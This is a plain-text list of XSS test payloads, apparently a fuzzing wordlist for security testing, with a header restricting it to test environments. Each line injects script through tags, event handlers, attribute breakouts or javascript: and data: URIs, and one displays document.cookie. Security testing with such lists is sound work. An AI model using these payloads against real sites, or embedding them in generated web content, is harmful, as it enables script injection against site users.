# XSS (Cross-Site Scripting) Test Payloads
# Use with caution - only against test environments
# Each line is a separate payload

<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert(1)>
<img src="x" onerror="alert('XSS')">
<svg onload=alert('XSS')>
<svg/onload=alert('XSS')>
<body onload=alert('XSS')>
<iframe src="javascript:alert('XSS')">
<input onfocus=alert('XSS') autofocus>
<input type="text" onfocus="alert('XSS')" autofocus>
"><script>alert('XSS')</script>
'><script>alert('XSS')</script>
"><img src=x onerror=alert('XSS')>
'><img src=x onerror=alert('XSS')>
<math><maction xlink:href="javascript:alert('XSS')">click</maction></math>
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>
<div style="background:url('javascript:alert(1)')">
<style>@import'javascript:alert(1)'</style>
<marquee onstart=alert('XSS')>
<video src=x onerror=alert('XSS')>
<audio src=x onerror=alert('XSS')>
<details open ontoggle=alert('XSS')>
<object data="javascript:alert('XSS')">
<embed src="javascript:alert('XSS')">
<a href="javascript:alert('XSS')">click</a>
<a href="data:text/html,<script>alert('XSS')</script>">click</a>
<form action="javascript:alert('XSS')"><input type=submit>
<isindex action="javascript:alert('XSS')" type=submit>
<base href="javascript:alert('XSS')">
<link rel="stylesheet" href="javascript:alert('XSS')">
<meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">
